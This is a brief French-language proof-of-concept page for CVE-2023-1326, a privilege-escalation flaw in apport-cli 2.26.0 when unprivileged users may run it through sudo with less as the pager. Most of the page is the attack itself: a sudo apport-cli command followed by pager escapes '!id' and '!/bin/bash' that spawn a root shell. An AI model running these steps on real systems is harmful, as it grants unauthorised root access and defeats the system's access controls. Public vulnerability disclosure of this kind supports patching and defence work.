
Preuve de concept d'exploit pour CVE-2023-1326, une vulnérabilité d'élévation de privilèges dans apport-cli 2.26.0 lorsqu'il est configuré avec sudo et less comme pagineur.
Une preuve de concept pour CVE-2023–1326 dans apport-cli 2.26.0
Cette vulnérabilité est une escalade de privilèges dans apport-cli 2.26.0, similaire à CVE-2023–26604, cette vulnérabilité ne fonctionne que si elle est attribuée dans sudoers :

Une attaque par escalade de privilèges a été découverte dans apport-cli 2.26.0 et versions antérieures, similaire à CVE-2023-26604. Si un système est spécialement configuré pour permettre à des utilisateurs non privilégiés d'exécuter sudo apport-cli, que less est configuré comme pagineur et que la taille du terminal peut être définie : un attaquant local peut escalader ses privilèges.
sudo /usr/bin/apport-cli -f



!id
!/bin/bash
